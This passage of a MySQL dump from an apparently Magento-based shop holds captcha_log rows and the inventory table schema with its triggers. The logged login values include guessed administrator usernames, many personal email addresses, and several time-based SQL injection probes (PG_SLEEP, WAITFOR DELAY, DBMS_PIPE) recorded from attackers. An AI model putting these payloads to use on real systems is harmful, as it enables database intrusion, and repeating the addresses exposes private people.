('2', 'josh', 11, '2024-10-08 03:39:46'),
('2', 'joshua', 1, '2023-03-23 15:45:01'),
('2', 'joyce30compon06@outlook.com', 6, '2024-09-22 17:29:26'),
('2', 'Jq1', 1, '2025-03-29 21:35:11'),
('2', 'Jq123456', 2, '2026-02-12 03:54:21'),
('2', 'Jqadmin', 79, '2026-03-24 18:32:42'),
('2', 'Jqadmin1', 1, '2026-02-27 14:42:17'),
('2', 'Jqadmin@admin.com', 8, '2026-03-03 01:04:33'),
('2', 'Jqadmin@bismoy.com', 9, '2026-02-15 23:36:40'),
('2', 'Jqadministrator', 1, '2025-04-06 00:33:18'),
('2', 'Jqbismoy', 9, '2026-02-14 09:28:32'),
('2', 'Jqbismoy@gmail.com', 1, '2025-04-03 04:31:50'),
('2', 'Jqchris', 1, '2026-02-27 14:42:18'),
('2', 'Jqdemo', 1, '2025-03-29 21:27:45'),
('2', 'Jqdeveloper', 1, '2025-04-04 02:25:54'),
('2', 'Jqeditor', 2, '2025-03-29 21:18:00'),
('2', 'Jqinfo@bismoy.com', 33, '2026-02-24 20:22:45'),
('2', 'Jqmanager', 1, '2025-03-29 21:26:32'),
('2', 'Jqmarketing', 1, '2026-02-27 14:39:51'),
('2', 'Jqsuperadmin', 1, '2026-02-27 14:42:17'),
('2', 'Jqsupport', 1, '2025-03-29 21:30:09'),
('2', 'Jqtest', 5, '2026-02-12 11:41:55'),
('2', 'Jqtest@test.com', 1, '2025-04-02 04:09:03'),
('2', 'Jqtesting', 1, '2025-03-29 21:28:57'),
('2', 'Jqwebadmin', 1, '2026-02-27 14:39:51'),
('2', 'Jqwebmaster', 1, '2025-04-05 13:18:47'),
('2', 'jSVIXs.twtjttt@brasswire.me', 1, '2023-12-12 04:13:48'),
('2', 'justin', 1, '2023-04-03 01:55:08'),
('2', 'kassiaanu31@gmail.com', 1, '2024-10-21 19:10:02'),
('2', 'kedivtnr@checkyourform.xyz', 1, '2026-02-15 12:11:03'),
('2', 'keithbarrows88@aol.com', 2, '2026-02-17 14:15:48'),
('2', 'kenneth', 1, '2023-03-24 05:14:19'),
('2', 'kevin', 1, '2023-03-24 18:47:30'),
('2', 'kgjt_acc6c76ede5c0d0b5313e3fb6f1906d50a865cca@trustmailticket.com', 1, '2024-11-13 16:22:00'),
('2', 'klueinc', 11, '2024-10-08 03:24:05'),
('2', 'knowable1975finnfinn@gmail.com', 10, '2021-04-29 01:29:15'),
('2', 'konstantin', 11, '2024-10-08 03:32:28'),
('2', 'kuevndpl@testform.xyz', 1, '2025-06-12 08:17:33'),
('2', 'kyle', 1, '2023-04-16 01:36:43'),
('2', 'larry', 1, '2023-04-02 11:57:55'),
('2', 'latanyamurillo@icloud.com', 1, '2024-05-02 17:57:05'),
('2', 'Leslie', 11, '2024-10-08 03:10:24'),
('2', 'LloydJTrask@gmail.com', 2, '2021-12-21 02:48:39'),
('2', 'llYtgGKT\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 11:12:46'),
('2', 'localsystem', 11, '2024-10-08 03:34:26'),
('2', 'lottiuxxuv72@gmail.com', 10, '2021-10-18 05:31:20'),
('2', 'lsaenz', 11, '2024-10-08 02:52:38'),
('2', 'lynelleeye49c041824@outlook.com', 2, '2022-08-06 12:53:05'),
('2', 'm.ohu.qu.b.4.1.1@gmail.com', 1, '2026-04-21 14:25:59'),
('2', 'mag', 11, '2024-10-08 03:35:33'),
('2', 'magcontrol', 11, '2024-10-08 03:17:07'),
('2', 'magcontroll', 1, '2021-11-04 19:32:28'),
('2', 'mage', 69, '2024-10-08 03:35:16'),
('2', 'magebay', 11, '2024-10-08 03:11:48'),
('2', 'magemojo', 11, '2024-10-08 03:34:59'),
('2', 'magento', 69, '2024-10-08 03:26:53'),
('2', 'magentodk', 11, '2024-10-08 03:17:24'),
('2', 'mageplaza', 57, '2024-10-08 02:54:20'),
('2', 'Magestore', 22, '2024-10-08 03:14:20'),
('2', 'Magestore1', 11, '2024-10-08 03:37:48'),
('2', 'Magewares', 11, '2024-10-08 03:14:36'),
('2', 'mageworld', 11, '2024-10-08 03:37:31'),
('2', 'mageworx', 86, '2024-10-08 03:29:58'),
('2', 'magsupport', 11, '2024-10-08 03:12:38'),
('2', 'magtechuser', 11, '2024-10-08 03:06:46'),
('2', 'manager', 722, '2026-02-25 15:05:11'),
('2', 'mangoit', 2, '2022-04-07 09:46:57'),
('2', 'mark', 1, '2023-03-20 20:31:14'),
('2', 'marketing', 1, '2026-02-27 14:40:00'),
('2', 'markiceu260ak82ekq9y@outlook.com', 10, '2022-07-20 04:58:59'),
('2', 'master', 11, '2024-10-08 03:31:38'),
('2', 'mat', 11, '2024-10-08 03:40:36'),
('2', 'matthew', 1, '2023-03-19 17:32:13');
INSERT INTO `captcha_log` (`type`, `value`, `count`, `updated_at`) VALUES
('2', 'MDtagliN\' OR 252=(SELECT 252 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:33:28'),
('2', 'mdyjxqdt@testform.xyz', 1, '2025-06-15 07:45:50'),
('2', 'michael', 1, '2023-03-14 16:46:10'),
('2', 'michel', 1, '2022-08-27 13:53:13'),
('2', 'mike', 11, '2024-10-08 02:56:01'),
('2', 'miketest', 11, '2024-10-08 03:15:27'),
('2', 'mildnet', 11, '2024-10-08 03:01:42'),
('2', 'mmcgill', 11, '2024-10-08 03:26:36'),
('2', 'mohovaxijupi81@gmail.com', 4, '2025-11-14 13:30:37'),
('2', 'moy', 1, '2023-02-17 01:03:56'),
('2', 'MsvipH.phtpqt@sabletree.foundation', 1, '2024-03-12 15:33:40'),
('2', 'mvLCoc.ttdjmpw@flexduck.click', 1, '2024-02-16 23:27:37'),
('2', 'mymhfadmin', 11, '2024-10-08 03:30:14'),
('2', 'myuser', 11, '2024-10-08 03:19:54'),
('2', 'nathan', 1, '2023-04-13 06:11:58'),
('2', 'nfsmagento', 11, '2024-10-08 03:36:40'),
('2', 'nicholas', 1, '2023-03-31 03:47:25'),
('2', 'noah', 1, '2023-04-17 19:08:37'),
('2', 'NuZCvEjr\') OR 976=(SELECT 976 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:54:52'),
('2', 'nxikvrwo@testform.xyz', 1, '2025-07-02 09:12:18'),
('2', 'o.seme.j.u.z.i.0.8@gmail.com', 1, '2026-03-27 17:52:04'),
('2', 'oanela4sai0oma014@outlook.com', 2, '2022-09-01 13:39:59'),
('2', 'oco.yese.f.a8.0.@gmail.com', 1, '2025-08-07 13:37:19'),
('2', 'OEpqKJ.qcchqqd@tonetics.biz', 1, '2023-12-07 10:58:22'),
('2', 'op.oy.im.o.baxe.h86@gmail.com', 1, '2026-01-13 15:17:08'),
('2', 'oqhdgfzu@immenseignite.info', 1, '2026-04-03 13:53:39'),
('2', 'orders', 11, '2024-10-08 03:12:55'),
('2', 'oscommerce', 11, '2024-10-08 03:36:23'),
('2', 'oSEUSVv6\') OR 903=(SELECT 903 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:06:10'),
('2', 'owner', 58, '2024-07-05 00:07:03'),
('2', 'p3HL1DZx\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 12:04:39'),
('2', 'panel', 11, '2024-10-08 03:32:45'),
('2', 'pass123', 3, '2025-11-19 23:19:17'),
('2', 'paswinskiegstephaniesy@gmail.com', 12, '2022-03-06 21:51:37'),
('2', 'patrick', 1, '2023-04-07 19:07:55'),
('2', 'paul', 1, '2023-03-22 12:44:59'),
('2', 'paulwoods8093@gmail.com', 10, '2021-06-05 17:46:13'),
('2', 'PerevodBlulk', 1, '2025-10-20 00:33:18'),
('2', 'peter', 1, '2023-04-15 12:02:17'),
('2', 'PPxsnM.dcwwmh@sabletree.foundation', 1, '2024-02-02 05:46:40'),
('2', 'premises.okonski7z@gmail.com', 10, '2022-02-07 18:56:02'),
('2', 'Production', 11, '2024-10-08 03:18:47'),
('2', 'pTwiiy.pwbchpc@rushlight.cfd', 1, '2024-02-24 22:49:38'),
('2', 'pum.eba.h.ezi.z.i0.8@gmail.com', 1, '2026-02-22 14:22:38'),
('2', 'pwsmage', 11, '2024-10-08 02:58:35'),
('2', 'qdjwjbdbhd.qh@monochord.xyz', 1, '2024-03-28 08:26:38'),
('2', 'qdjwjbdbhd.qp@monochord.xyz', 1, '2024-03-28 08:26:56'),
('2', 'qfsvqhlo@testform.xyz', 1, '2025-06-25 11:57:10'),
('2', 'qqqjmwcbcc.qh@monochord.xyz', 1, '2024-03-24 22:20:28'),
('2', 'qqqjmwcbcc.qp@monochord.xyz', 1, '2024-03-24 22:20:33'),
('2', 'qrpopkjl@testform.xyz', 1, '2025-05-27 08:24:07'),
('2', 'quzluriyol@outlook.com', 2, '2022-12-22 15:36:42'),
('2', 'qwWBqnXW\' OR 457=(SELECT 457 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:09:19'),
('2', 'r.o.c.u.ye.x.u.y559@gmail.com', 1, '2026-04-18 13:34:12'),
('2', 'RamiroGolubev247@gmail.com', 12, '2021-12-22 07:34:12'),
('2', 'raymond', 1, '2023-04-08 09:13:46'),
('2', 'rearne', 1, '2022-01-27 11:59:16'),
('2', 'redaktion', 11, '2024-10-08 03:08:44'),
('2', 'reladmin', 11, '2024-10-08 03:07:03'),
('2', 'Remmote', 11, '2024-10-08 03:15:43'),
('2', 'richard', 1, '2023-03-16 08:56:33'),
('2', 'robert', 1, '2023-03-13 13:50:33'),
('2', 'ronald', 1, '2023-03-27 01:09:11'),
('2', 'root', 43, '2024-10-08 02:56:35'),
('2', 'rtJOAO.mhqwtt@virilia.life', 1, '2023-12-02 06:52:03'),
('2', 'rtlrtuhi@testform.xyz', 1, '2025-07-09 12:57:33'),
('2', 'rtng', 11, '2024-10-08 03:26:02'),
('2', 'ryan', 1, '2023-03-29 08:37:59'),
('2', 's1KbSr5S\' OR 735=(SELECT 735 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:57:54'),
('2', 'sadmin', 11, '2024-10-08 03:17:57'),
('2', 'sales', 58, '2024-07-05 00:29:01'),
('2', 'sample@email.tst', 800, '2025-03-08 12:40:20'),
('2', 'sample@email.tst\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 12, '2025-03-08 12:07:33'),
('2', 'samuel', 1, '2023-04-05 10:16:59'),
('2', 'sanngravesz7143@gmail.com', 1, '2024-10-26 02:33:52'),
('2', 'scott', 1, '2023-04-03 16:00:49'),
('2', 'se.y.oj.ere.6.87@gmail.com', 2, '2026-03-02 01:55:01'),
('2', 'sedasertf710@gmail.com', 12, '2022-04-16 06:35:51'),
('2', 'selinamdws@gmail.com', 12, '2022-03-27 13:24:27'),
('2', 'seo', 34, '2025-11-14 15:31:27'),
('2', 'seouser', 603, '2026-02-25 16:24:59'),
('2', 'service', 11, '2024-10-08 03:10:41'),
('2', 'sherikahollimanfgv5@gmail.com', 12, '2022-02-23 21:10:02'),
('2', 'Shipping', 22, '2024-10-08 03:38:55'),
('2', 'SHKXlN.bqbqjd@chiffon.fun', 1, '2024-01-27 10:54:37'),
('2', 'shopmanager', 11, '2024-10-08 03:00:51'),
('2', 'siiqon.bmpbhqq@lustrum.cfd', 1, '2024-01-01 21:04:02'),
('2', 'simonmccarthy9355@gmail.com', 12, '2021-05-12 07:48:26'),
('2', 'siteadmin', 11, '2024-10-08 03:18:14'),
('2', 'SJfRzO.phtcmb@sabletree.foundation', 1, '2024-03-12 15:33:35'),
('2', 'slee84134@gmail.com', 12, '2022-01-14 01:51:42'),
('2', 'smedoff', 11, '2024-10-08 03:31:55'),
('2', 'sorenthomasgf@gmail.com', 1, '2022-03-15 03:45:26'),
('2', 'SSqlDh.qcchqbw@tonetics.biz', 1, '2023-12-07 10:58:57'),
('2', 'staff', 11, '2024-10-08 03:09:34'),
('2', 'staff.develo', 11, '2024-10-08 03:03:25'),
('2', 'staff_test', 11, '2024-10-08 03:11:14'),
('2', 'steelesimfoniyax8834@gmail.com', 1, '2024-10-18 10:24:29'),
('2', 'steven', 1, '2023-03-21 23:19:32'),
('2', 'storemanager', 603, '2026-02-25 13:45:29'),
('2', 'stores', 11, '2024-10-08 02:59:43'),
('2', 'subcomponentraleigh@gmail.com', 10, '2021-05-27 14:50:41'),
('2', 'sUBhTc.pmqjmjc@kerfuffle.asia', 1, '2024-03-06 08:37:09'),
('2', 'SukR9ZJs\' OR 52=(SELECT 52 FROM PG_SLEEP(15))--', 1, '2023-08-12 13:59:42'),
('2', 'sumadmin', 68, '2024-10-08 02:53:30'),
('2', 'summersroger9@gmail.com', 12, '2021-11-06 09:09:50'),
('2', 'Superadmin', 23, '2026-02-27 14:42:26'),
('2', 'superadmins', 11, '2024-10-08 03:20:44'),
('2', 'supp', 58, '2024-07-05 00:23:41'),
('2', 'support', 859, '2026-02-25 11:59:10'),
('2', 'support1', 83, '2024-10-08 02:52:55'),
('2', 'sysadm', 11, '2024-10-08 03:05:05'),
('2', 'sysadmiin', 11, '2024-10-08 03:05:56'),
('2', 'sysadmin', 11, '2024-10-08 02:59:59'),
('2', 'sysmon', 11, '2024-10-08 03:41:43'),
('2', 'system', 11, '2024-10-08 03:09:50'),
('2', 'system23', 11, '2024-10-08 03:14:53'),
('2', 'system32', 11, '2024-10-08 02:56:52'),
('2', 'systembackup', 11, '2024-10-08 03:06:13'),
('2', 'systems', 11, '2024-10-08 03:05:22'),
('2', 'systemuser', 11, '2024-10-08 03:21:01'),
('2', 'system_backup', 12, '2024-10-08 03:10:07'),
('2', 't4oBlMUd\')) OR 693=(SELECT 693 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:43:44'),
('2', 'tanmoy.brand@ramybd.com', 1, '2021-05-03 08:46:30'),
('2', 'TcAtCebY\') OR 545=(SELECT 545 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:12:58'),
('2', 'tech', 58, '2024-07-05 00:58:49'),
('2', 'techsupport', 59, '2024-10-08 02:54:37'),
('2', 'tempadmin', 11, '2024-10-08 03:30:47'),
('2', 'tempUser', 11, '2024-10-08 03:23:31'),
('2', 'temp_admin', 11, '2024-10-08 03:17:40'),
('2', 'temp_backup', 11, '2024-10-08 03:12:22'),
('2', 'tequkizana98@gmail.com', 4, '2025-11-10 07:18:18'),
('2', 'test', 148, '2026-02-12 11:42:02'),
('2', 'test@test.com', 1, '2025-04-02 04:09:10'),
('2', 'testadmin', 11, '2024-10-08 03:19:21'),
('2', 'testing', 12, '2025-03-29 21:29:04'),
('2', 'testlogin', 11, '2024-10-08 03:07:53'),
('2', 'testuser', 11, '2024-10-08 03:10:58'),
('2', 'TGKaqH5l\' OR 577=(SELECT 577 FROM PG_SLEEP(15))--', 1, '2023-08-12 13:31:39'),
('2', 'thomas', 1, '2023-03-17 11:41:54'),
('2', 'timothy', 1, '2023-03-26 11:07:58'),
('2', 'TmNGYooN\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 12:20:00'),
('2', 'tonnettafy8ba205fe@outlook.com', 2, '2022-08-15 15:45:02'),
('2', 'totewinthropbirrueta@gmail.com', 10, '2021-04-26 22:19:19'),
('2', 'TPYVfa.cjppdb@rottack.autos', 1, '2023-11-10 10:35:13'),
('2', 'truggrop@smallbutnaughty.com', 1, '2025-09-04 20:53:30'),
('2', 'tuqawabebuy04@gmail.com', 7, '2025-11-18 03:11:17'),
('2', 'tyler', 1, '2023-04-10 18:47:52'),
('2', 'UB0ghDGD\')) OR 687=(SELECT 687 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:59:14'),
('2', 'UbteYXXu\'; waitfor delay \'0:0:15\' -- ', 1, '2023-08-12 11:23:50'),
('2', 'ujang', 11, '2024-10-08 03:05:39'),
('2', 'ujerimiahu57oa45@outlook.com', 12, '2022-06-22 14:52:38'),
('2', 'uloxu.h.esuj.i.b.45@gmail.com', 1, '2026-04-10 17:28:07'),
('2', 'uluzafocewu632@gmail.com', 7, '2025-10-26 07:47:51'),
('2', 'unknown', 11, '2024-10-08 03:33:52'),
('2', 'update', 11, '2024-10-08 03:27:43'),
('2', 'uq.o.h.ah.i.hejo45@gmail.com', 1, '2026-04-09 14:20:23'),
('2', 'user', 11, '2024-10-08 03:16:17'),
('2', 'user1', 11, '2024-10-08 03:16:33'),
('2', 'uSiTKK.twtjtdb@brasswire.me', 1, '2023-12-12 04:13:51'),
('2', 'uttWPW.tdwcpbw@borasca.xyz', 1, '2023-11-26 22:37:11'),
('2', 'utugacovil522@gmail.com', 7, '2025-11-09 09:23:54'),
('2', 'v.y.e.ry.s.hani.kky.a@gmail.com\r\n', 1, '2025-03-14 02:25:41'),
('2', 'v2z8eKJ9\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 11:55:01'),
('2', 'varien', 58, '2024-07-05 02:27:01'),
('2', 'vcolletteuo37w14z5iev0s@outlook.com', 14, '2022-07-20 17:28:39'),
('2', 'VcPXYw.ddpmmpw@paravane.biz', 1, '2023-12-01 00:22:32'),
('2', 'veteran', 1, '2021-11-30 12:45:39'),
('2', 'vGw6VtWW\')) OR 501=(SELECT 501 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:10:45'),
('2', 'vprwkhyz@testform.xyz', 1, '2025-06-30 04:11:29'),
('2', 'vStHSmA4\') OR 538=(SELECT 538 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:23:53'),
('2', 'walter', 1, '2023-04-17 05:19:44'),
('2', 'warehouse', 11, '2024-10-08 03:38:22'),
('2', 'WASENDDDD', 1, '2023-09-26 17:59:54'),
('2', 'web', 34, '2025-11-17 22:26:07'),
('2', 'webadmin', 1, '2026-02-27 14:40:00'),
('2', 'webmaster', 12, '2025-04-05 13:18:54'),
('2', 'Webwise', 11, '2024-10-08 03:21:51'),
('2', 'wFnVuPqy\')) OR 776=(SELECT 776 FROM PG_SLEEP(15))--', 1, '2023-08-12 11:31:58'),
('2', 'will', 11, '2024-10-08 03:40:03'),
('2', 'william', 1, '2023-03-15 19:35:31'),
('2', 'wjwjbsvgdnsvd@gmail.com', 12, '2022-03-28 13:05:53'),
('2', 'woocommerce', 11, '2024-10-08 03:36:07'),
('2', 'wTsMwjhL\') OR 171=(SELECT 171 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:20:02'),
('2', 'wvvvferijxmff@yahoo.com', 1, '2024-11-04 11:57:59'),
('2', 'wyvlqekj@testform.xyz', 1, '2025-06-09 19:34:46'),
('2', 'xadeyaja181@gmail.com', 2, '2026-01-03 11:03:52'),
('2', 'XBwbQCWg\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 12:06:26'),
('2', 'xrumer23Men@gmail.com', 1, '2026-04-02 18:45:57'),
('2', 'xtento', 11, '2024-10-08 03:11:31'),
('2', 'XvmZIRe3\' OR 939=(SELECT 939 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:05:20'),
('2', 'xWMIaD.wbwhdjm@usufruct.bar', 1, '2023-12-13 18:55:35'),
('2', 'ydayleen6qi2j48uy4g5@outlook.com', 1, '2022-08-23 06:02:53'),
('2', 'yLFFDP.mdtqcq@chiffon.fun', 1, '2024-02-05 02:47:53'),
('2', 'zachary', 1, '2023-04-14 22:38:04'),
('2', 'zangelikak30a89zehc@outlook.com', 6, '2022-06-28 00:43:31'),
('2', 'zeboruqihos739@gmail.com', 8, '2025-10-21 00:10:03'),
('2', 'ZGW2pwQA\'; waitfor delay \'0:0:15\' -- ', 1, '2025-03-08 11:32:46'),
('2', 'zMVSFs.tdwcptb@borasca.xyz', 1, '2023-11-26 22:37:05'),
('2', 'zogerocaho13@gmail.com', 1, '2025-12-04 10:33:38'),
('2', 'ZyoGSvcF\') OR 943=(SELECT 943 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:43:42'),
('2', '_admin', 11, '2024-10-08 02:54:54'),
('2', '_auto_update', 11, '2024-10-08 03:31:21'),
('2', '_system_backup', 11, '2024-10-08 03:07:19'),
('2', '大翔27@orimi.co', 2, '2026-03-29 05:57:37'),
('2', '愛菜_松本68@zebyinbox.com', 4, '2026-01-13 12:28:35'),
('2', '結衣.山本4@jephy-webmail.com', 7, '2026-01-13 12:30:18'),
('2', '蒼空.山口10@banglemail.com', 3, '2026-02-17 14:15:53');

-- --------------------------------------------------------

--
-- Table structure for table `cataloginventory_stock`
--

CREATE TABLE `cataloginventory_stock` (
  `stock_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Stock ID',
  `website_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Website ID',
  `stock_name` varchar(255) DEFAULT NULL COMMENT 'Stock Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock';

--
-- Dumping data for table `cataloginventory_stock`
--

INSERT INTO `cataloginventory_stock` (`stock_id`, `website_id`, `stock_name`) VALUES
(1, 0, 'Default');

-- --------------------------------------------------------

--
-- Table structure for table `cataloginventory_stock_item`
--

CREATE TABLE `cataloginventory_stock_item` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Item ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `stock_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Stock ID',
  `qty` decimal(12,4) DEFAULT NULL COMMENT 'Qty',
  `min_qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Min Qty',
  `use_config_min_qty` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Min Qty',
  `is_qty_decimal` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Qty Decimal',
  `backorders` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Backorders',
  `use_config_backorders` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Backorders',
  `min_sale_qty` decimal(12,4) NOT NULL DEFAULT 1.0000 COMMENT 'Min Sale Qty',
  `use_config_min_sale_qty` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Min Sale Qty',
  `max_sale_qty` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Max Sale Qty',
  `use_config_max_sale_qty` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Max Sale Qty',
  `is_in_stock` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is In Stock',
  `low_stock_date` timestamp NULL DEFAULT NULL COMMENT 'Low Stock Date',
  `notify_stock_qty` decimal(12,4) DEFAULT NULL COMMENT 'Notify Stock Qty',
  `use_config_notify_stock_qty` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Notify Stock Qty',
  `manage_stock` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Manage Stock',
  `use_config_manage_stock` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Manage Stock',
  `stock_status_changed_auto` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Stock Status Changed Automatically',
  `use_config_qty_increments` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Qty Increments',
  `qty_increments` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Qty Increments',
  `use_config_enable_qty_inc` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Use Config Enable Qty Increments',
  `enable_qty_increments` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Enable Qty Increments',
  `is_decimal_divided` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is Divided into Multiple Boxes for Shipping',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cataloginventory Stock Item';

--
-- Dumping data for table `cataloginventory_stock_item`
--

INSERT INTO `cataloginventory_stock_item` (`item_id`, `product_id`, `stock_id`, `qty`, `min_qty`, `use_config_min_qty`, `is_qty_decimal`, `backorders`, `use_config_backorders`, `min_sale_qty`, `use_config_min_sale_qty`, `max_sale_qty`, `use_config_max_sale_qty`, `is_in_stock`, `low_stock_date`, `notify_stock_qty`, `use_config_notify_stock_qty`, `manage_stock`, `use_config_manage_stock`, `stock_status_changed_auto`, `use_config_qty_increments`, `qty_increments`, `use_config_enable_qty_inc`, `enable_qty_increments`, `is_decimal_divided`, `website_id`) VALUES
(1776, 1776, 1, 100.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 0.0000, 1, 1, NULL, NULL, 1, 0, 1, 0, 1, 0.0000, 1, 0, 0, 0),
(2052, 2052, 1, 100.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 0.0000, 1, 1, NULL, NULL, 1, 0, 1, 0, 1, 0.0000, 1, 0, 0, 0),
(2053, 2053, 1, 0.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 0.0000, 1, 1, NULL, NULL, 1, 0, 1, 0, 1, 0.0000, 1, 0, 0, 0),
(2054, 2054, 1, 22.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2055, 2055, 1, 32.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2057, 2057, 1, 0.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 0, '2020-08-20 11:21:19', 1.0000, 1, 1, 1, 1, 1, 1.0000, 1, 0, 0, 0),
(2058, 2058, 1, 32.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2059, 2059, 1, 32.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2060, 2060, 1, 34.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2061, 2061, 1, 65.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2062, 2062, 1, 43.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2063, 2063, 1, 53.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0),
(2064, 2064, 1, 5.0000, 0.0000, 1, 0, 0, 1, 1.0000, 1, 10000.0000, 1, 1, NULL, 1.0000, 1, 1, 1, 0, 1, 1.0000, 1, 0, 0, 0);

--
-- Triggers `cataloginventory_stock_item`
--
DELIMITER $$
CREATE TRIGGER `trg_cataloginventory_stock_item_after_delete` AFTER DELETE ON `cataloginventory_stock_item` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (OLD.`product_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_cataloginventory_stock_item_after_insert` AFTER INSERT ON `cataloginventory_stock_item` FOR EACH ROW BEGIN
INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`product_id`);
END
$$
DELIMITER ;
DELIMITER $$
CREATE TRIGGER `trg_cataloginventory_stock_item_after_update` AFTER UPDATE ON `cataloginventory_stock_item` FOR EACH ROW BEGIN
IF (NOT(NEW.`item_id` <=> OLD.`item_id`) OR NOT(NEW.`product_id` <=> OLD.`product_id`) OR NOT(NEW.`stock_id` <=> OLD.`stock_id`) OR NOT(NEW.`qty` <=> OLD.`qty`) OR NOT(NEW.`min_qty` <=> OLD.`min_qty`) OR NOT(NEW.`use_config_min_qty` <=> OLD.`use_config_min_qty`) OR NOT(NEW.`is_qty_decimal` <=> OLD.`is_qty_decimal`) OR NOT(NEW.`backorders` <=> OLD.`backorders`) OR NOT(NEW.`use_config_backorders` <=> OLD.`use_config_backorders`) OR NOT(NEW.`min_sale_qty` <=> OLD.`min_sale_qty`) OR NOT(NEW.`use_config_min_sale_qty` <=> OLD.`use_config_min_sale_qty`) OR NOT(NEW.`max_sale_qty` <=> OLD.`max_sale_qty`) OR NOT(NEW.`use_config_max_sale_qty` <=> OLD.`use_config_max_sale_qty`) OR NOT(NEW.`is_in_stock` <=> OLD.`is_in_stock`) OR NOT(NEW.`low_stock_date` <=> OLD.`low_stock_date`) OR NOT(NEW.`notify_stock_qty` <=> OLD.`notify_stock_qty`) OR NOT(NEW.`use_config_notify_stock_qty` <=> OLD.`use_config_notify_stock_qty`) OR NOT(NEW.`manage_stock` <=> OLD.`manage_stock`) OR NOT(NEW.`use_config_manage_stock` <=> OLD.`use_config_manage_stock`) OR NOT(NEW.`stock_status_changed_auto` <=> OLD.`stock_status_changed_auto`) OR NOT(NEW.`use_config_qty_increments` <=> OLD.`use_config_qty_increments`) OR NOT(NEW.`qty_increments` <=> OLD.`qty_increments`) OR NOT(NEW.`use_config_enable_qty_inc` <=> OLD.`use_config_enable_qty_inc`) OR NOT(NEW.`enable_qty_increments` <=> OLD.`enable_qty_increments`) OR NOT(NEW.`is_decimal_divided` <=> OLD.`is_decimal_divided`) OR NOT(NEW.`website_id` <=> OLD.`website_id`)) THEN INSERT IGNORE INTO `scconnector_google_feed_cl` (`entity_id`) VALUES (NEW.`product_id`); END IF;
END
$$
DELIMITER ;

-- --------------------------------------------------------

--
